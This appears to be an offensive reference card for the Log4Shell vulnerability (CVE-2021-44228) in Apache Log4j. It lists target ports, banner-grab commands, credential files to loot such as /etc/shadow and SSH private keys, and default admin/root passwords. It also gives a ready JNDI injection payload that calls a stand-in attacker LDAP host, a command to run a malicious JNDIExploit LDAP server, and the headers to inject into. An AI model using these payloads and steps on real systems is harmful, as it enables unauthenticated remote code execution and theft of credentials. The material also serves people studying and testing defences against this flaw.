Log4Shell (Log4j JNDI)
Log4ShellLog4jCVE-2021-44228JNDI Injection
Log4Shell (CVE-2021-44228) is a critical RCE vulnerability in Apache Log4j 2. JNDI lookup injection allows unauthenticated remote code execution.
Ports
| Port | Protocol | Description |
|---|---|---|
| 80 | tcp | HTTP |
| 443 | tcp | HTTPS |
| 389 | tcp | LDAP |
| 1389 | tcp | LDAP (JNDI) |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
nmap -sV -p <port> <target> | Service banner and version info |
nc -nv <target> <port> | Raw banner grab |
Key Files
| Path | Description |
|---|---|
/etc/passwd | List of system users |
/etc/shadow | Password hashes for local users |
/etc/ssh/sshd_config | SSH server configuration |
~/.ssh/id_rsa | SSH private key |
Default Credentials
| Username | Password | Context |
|---|---|---|
admin | admin | Generic admin account |
root | root | Generic root account |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
CVE-2021-44228 | RCE | Log4Shell — JNDI lookup RCE in Log4j |
CVE-2021-45046 | RCE | Log4j 2.15.0 insufficient fix bypass |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| JNDI Injection | ${jndi:ldap://<attacker>/a} | Trigger JNDI lookup |
| LDAP Server | java -jar JNDIExploit.jar -i <attacker> | Host malicious LDAP server |
Notes
Payload: `${jndi:ldap://attacker.com/a}` in any user-controlled input field.
Headers like `User-Agent`, `X-Forwarded-For`, and `Authorization` are common injection vectors.
Tools: `JNDIExploit`, `marshalsec`, `log4j-scan`.
Seen on
ShodanCensysFOFAZoomEye
References